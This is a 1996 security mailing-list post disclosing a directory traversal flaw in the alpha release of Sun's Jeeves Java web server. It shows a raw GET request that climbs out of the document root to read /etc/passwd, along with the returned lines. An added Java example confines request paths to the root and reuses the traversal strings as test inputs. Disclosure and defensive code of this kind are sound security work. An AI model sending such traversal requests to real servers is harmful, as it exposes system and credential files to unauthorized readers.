From stefan@netscafe.rotterdam.luna.net  Wed Sep  4 07:38:43 1996
Received: from netscafe.rotterdam.luna.net (netscafe.rotterdam.luna.net [194.151.24.23]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id HAA02981 for <best-of-security@suburbia.net>; Wed, 4 Sep 1996 07:38:30 +1000
Received: from netscafe.rotterdam.luna.net (localhost [127.0.0.1]) by netscafe.rotterdam.luna.net (8.7.5/8.7.3) with ESMTP id XAA06864 for <best-of-security@suburbia.net>; Tue, 3 Sep 1996 23:30:29 +0200 (MET DST)
Message-Id: <199609032130.XAA06864@netscafe.rotterdam.luna.net>
To: best-of-security@suburbia.net
Subject: Sun's Jeeves WWW Server
Date: Tue, 03 Sep 1996 23:30:28 +0200
From: Stefan Arentz <stefan@netscafe.rotterdam.luna.net>


Quoted from http://www.javasoft.com/products/jeeves/index.html

Jeeves is JavaSoft's Java-Powered Internet Server and framework for
an extensible family of Java-based network services. Jeeves defines
the Java Servlet APIs for the quick and easy creation, installation,
administration and security of Java-based network servers.


OK, this is an alpha release, but still it's very, very stupid of
Sun to let this slip through. Hopefully they fix it in the final
release :-/

Connected to xxxx.xxxx.xxxx.xxxx
Escape character is '^]'.
GET /../../../../../../../../../../etc/passwd
root:x:0:1:Super-User:/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
...

Have fun,
 -- Stefan Arentz, Luna Internet
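
[Added example, not part of the original post and not Jeeves code: one way a Java server can confine request paths to its document root, so a GET like the one above is refused. The class name, the document root and the sample requests are assumptions made for illustration.]

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Optional;

public class DocRootResolver {              // hypothetical class name
    private final Path root;

    public DocRootResolver(String documentRoot) {
        // Absolute, normalized form of the root, computed once.
        this.root = Paths.get(documentRoot).toAbsolutePath().normalize();
    }

    /** Maps a request path to a file under the root; empty means "refuse". */
    public Optional<Path> resolve(String requestPath) {
        try {
            // Decode percent-escapes before checking, so an encoded ".." is
            // judged in the same form the filesystem will see. URLDecoder
            // turns '+' into a space, so protect literal '+' first.
            String decoded = URLDecoder.decode(
                    requestPath.replace("+", "%2B"), StandardCharsets.UTF_8);
            // Drop leading slashes: the path must be relative to the root.
            String relative = decoded.replaceFirst("^/+", "");
            // normalize() collapses "." and ".." lexically.
            Path candidate = root.resolve(relative).normalize();
            // startsWith() compares whole path components, so a sibling
            // such as /srv/www/public_html_old does not pass.
            return candidate.startsWith(root)
                    ? Optional.of(candidate) : Optional.empty();
        } catch (IllegalArgumentException e) {
            // Malformed escape, or a path the platform rejects (e.g. NUL).
            return Optional.empty();
        }
    }

    public static void main(String[] args) {
        DocRootResolver r = new DocRootResolver("/srv/www/public_html"); // assumed root
        String[] samples = {                 // constructed test inputs
            "/index.html",
            "/docs/../index.html",
            "/../../../../../../../../../../etc/passwd",   // request from the post
            "/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
        };
        for (String s : samples) {
            System.out.println(s + " -> "
                    + r.resolve(s).map(Path::toString).orElse("REFUSED"));
        }
    }
}
```

The check is lexical only: a symbolic link inside the document root can still point outside it, so a server that allows symlinks should also compare `toRealPath()` of the file against the real path of the root before opening it.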

